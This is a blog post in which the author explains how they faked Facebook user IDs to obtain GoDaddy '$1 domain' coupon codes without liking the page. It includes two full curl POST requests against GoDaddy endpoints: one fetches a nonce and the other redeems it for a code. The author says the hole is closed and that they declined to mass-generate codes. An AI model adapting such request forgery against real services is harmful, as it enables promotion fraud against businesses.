The other day I saw GoDaddy giving out “$1 for a domain” coupons if you “liked” them on facebook.
That’s cool. I love $1 domains. But I don’t “like” anyone on facebook. So after almost an of poking around and reading their javascript, here is what I discovered. (Btw, this does not work anymore, so I am basically just bragging… I know, it’s sad really…)
Here it how it worked:
1) You liked the GoDaddy page
2) You clicked on a link that said “Get Code”
3) A code is populated in a field, much like a scratch off pin # on gift cards.
At first I kept trying to mimic their javascript, but send in fake information:
curl -i -H "Accept: application/json" -H "Content-Type: application/json" -X POST -d '{"getPromoModel":{"Email":"hi@godaddy.admin","Name":"how are you doing?","FacebookUserId":123456789,"OptIn":false,"ShopperId":1,"LikedTime":1,"Nonce":"b766daba70ebfa3e0800a4e20dd803ecb766daba70ebfa3e0800a4e20dd803ec"}}' http://beta.gadgets.godaddy.com/Fb.FanOnly/ViralDomainOffer.aspx/GetPromoCode
It did not work. It kept responding with a JSON that said “error”.
I almost gave up thinking that they must keep a list of FacebookUserIDs for everyone who actually “liked” them, so I could not just send in a fake ID.
But then I noticed that before they make a “GetPromoCode” request, they made a “CheckIfAlreadyGivenCode” request. Ok let’s do that.
curl -i -H "Accept: application/json" -H "Content-Type: application/json" -X POST -d "{'getPromoModel':{'FacebookUserId':123456789}}" http://beta.gadgets.godaddy.com/Fb.FanOnly/ViralDomainOffer.aspx/CheckIfAlreadyGivenCode
Bingo! It would return a “nonce” string specific to that User ID, which could be any random number.
Take that nonce and fake id, plug it back into the original “GetPromoCode”, and bam, the GoDaddy server returned with a valid coupon code.
Now… as much as I hate GoDaddy from the story I told in my last post, I try really hard to not be too stupid when it comes to computer mischiefs. So although I could have pounded their server and generated a ton of coupon codes, I decided it was not right for me to do that.
I was just content with being able to game them and left it at that. Although I was very very tempted to generate a big list and pass them out on slickdeals.